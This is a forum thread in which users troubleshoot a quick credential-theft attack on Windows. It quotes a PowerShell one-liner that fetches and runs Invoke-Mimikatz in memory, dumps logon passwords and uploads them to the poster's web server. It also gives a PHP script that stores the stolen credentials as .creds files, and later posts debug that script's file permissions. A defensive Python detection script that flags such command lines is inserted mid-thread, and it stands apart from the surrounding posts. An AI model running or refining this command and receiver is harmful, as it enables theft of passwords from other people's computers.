
15 Second Mr. Robot Hack question


Exmix


So thanks to ThoughtfulDev I was able to get this working very nicely.

So after testing it on mine and my cousin's Windows 7 PC (with his permission of course), those worked great, but when testing with our Windows 10 PCs, I got an error.

  .#####.   mimikatz 2.1 (x64) built on Nov 10 2016 15:31:14
 .## ^ ##.  "A La Vie, A L'Amour"
 ## / \ ##  /* * *
 ## \ / ##   Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
 '## v ##'   http://blog.gentilkiwi.com/mimikatz             (oe.eo)
  '#####'                                     with 20 modules * * */
ERROR mimikatz_initOrClean ; CoInitializeEx: 80010106

mimikatz(powershell) # sekurlsa::logonpasswords
ERROR kuhl_m_sekurlsa_acquireLSA ; Handle on memory (0x00000005)

mimikatz(powershell) # exit
Bye!

I tried this on a few other Windows 10 PCs to make sure it wasn't just those PCs in specific. I was wondering if anyone else has gotten this or might know a way around this or a possible fix.


On 9/6/2017 at 11:00 PM, kdodge said:

 

Are you sure you're running it as Administrator?

100% positive. I'm doing it from my Windows 10 laptop, running this script from an administrator command prompt.

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

With that I still get the Output I put in my first post.
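A defender's view of the command line quoted above, as an added example that is not part of the original posts: a small Python triage routine that flags process-creation command lines containing the same three elements (in-memory download and execute, `Invoke-Mimikatz`, and `UploadString`). The event fields `host` and `cmdline`, the rule names and the sample events are assumptions constructed for illustration; it presumes command-line logging for process creation is already collected.

```python
import re

# Indicators taken from the command line quoted in this thread.
RULES = {
    "download_cradle": re.compile(r"\b(iex|invoke-expression)\b.*\bdownloadstring\b"),
    "credential_dump": re.compile(r"invoke-mimikatz|sekurlsa::logonpasswords"),
    "http_upload": re.compile(r"\buploadstring\b"),
}

def normalize(cmdline):
    """Lowercase, drop cmd carets / PowerShell backticks, collapse whitespace."""
    cleaned = cmdline.replace("^", "").replace("`", "")
    return re.sub(r"\s+", " ", cleaned).strip().lower()

def classify(cmdline):
    """Return the sorted list of rule names that match one command line."""
    text = normalize(cmdline)
    return sorted(name for name, rx in RULES.items() if rx.search(text))

def triage(events):
    """Return (host, severity, hits) for each event that matches a rule."""
    alerts = []
    for ev in events:
        hits = classify(ev["cmdline"])
        if not hits:
            continue
        severity = "high" if "credential_dump" in hits else "medium"
        alerts.append((ev["host"], severity, hits))
    return alerts

# Constructed sample events (hypothetical hosts, not real telemetry).
SAMPLE_EVENTS = [
    {"host": "WS-01", "cmdline": "powershell \"IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)\""},
    {"host": "WS-02", "cmdline": "powershell -NoProfile -Command Get-ChildItem C:\\Users"},
    {"host": "WS-03", "cmdline": "PowerShell  I`EX (New-Object Net.WebClient).Download^String('http://updates.example/setup.ps1')"},
]

if __name__ == "__main__":
    for alert in triage(SAMPLE_EVENTS):
        print(alert)
```

String matching of this kind is a first-pass filter; script block logging and alerts on handle requests to the lsass process cover cases where the command line itself is renamed or encoded.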


1 hour ago, kdodge said:

It could be a bug, you might try contacting the author.

One other thing I can think of, are you running an AV? The description says "...Without rights to access lsass process..." so an antivirus program might just be blocking access to that process, even if you have admin rights. It kinda sounds like something is anyway.

I am, but that is disabled. I know the AV detects it.

Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.

Edited by Exmix

  • 2 months later...
On 9/8/2017 at 11:49 PM, Exmix said:

I am, but that is disabled. I know the AV detects it.

Contacting the owner - I posted it here since it was @Darren Kitchen who made the YouTube video on it.

Windows 10 has patched lsass now which effectively breaks mimikatz functionality.

Edited by TeCHemically

I have a question about this; I have always used tcpdump for this attack because the PHP file never gathers the incoming credentials. Can someone tell me what I am doing wrong? I am using the same command as above:

powershell "IEX (New-Object Net.WebClient).DownloadString('MyWebServer/My.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('MyWebServer/My.php', $output)"

Here is the PHP script:

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds"; file_put_contents($file, file_get_contents("php://input"));
?>

 

It was broken up like this before, but didn't seem to have any effect (I know almost nothing of PHP, so this probably makes no difference):

<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";

file_put_contents($file, file_get_contents("php://input"));
?>
 

Thanks to any who reply!


On 11/19/2017 at 1:25 PM, kdodge said:

It could be a lot of things, but you should start with checking if the file has write permissions to the server you're running this on.


<?php
$file = $_SERVER['REMOTE_ADDR'] . "_" . date("Y-m-d_H-i-s") . ".creds";
if(is_writable($file)) file_put_contents($file, file_get_contents("php://input")); else echo $file.' is not writable.';
?>

Run tcpdump with this to see if it's not writable.

Great advice, thanks for your response! I took your advice and here is what I got: 2017-11-20_19-46-03.creds is not writable.#file_put_contents($file, file_get_contents("php://input"));

 

So, it looks like the file does not have write permissions. I thought I had the permissions set appropriately; but clearly I wasn't right. The file has write permissions for www-data (file is owned by www-data). What setting do I need to set so that this file has permissions to write to the server? Sorry for the nooby question. Thanks again for your help in identifying the issue!

Edited by TeCHemically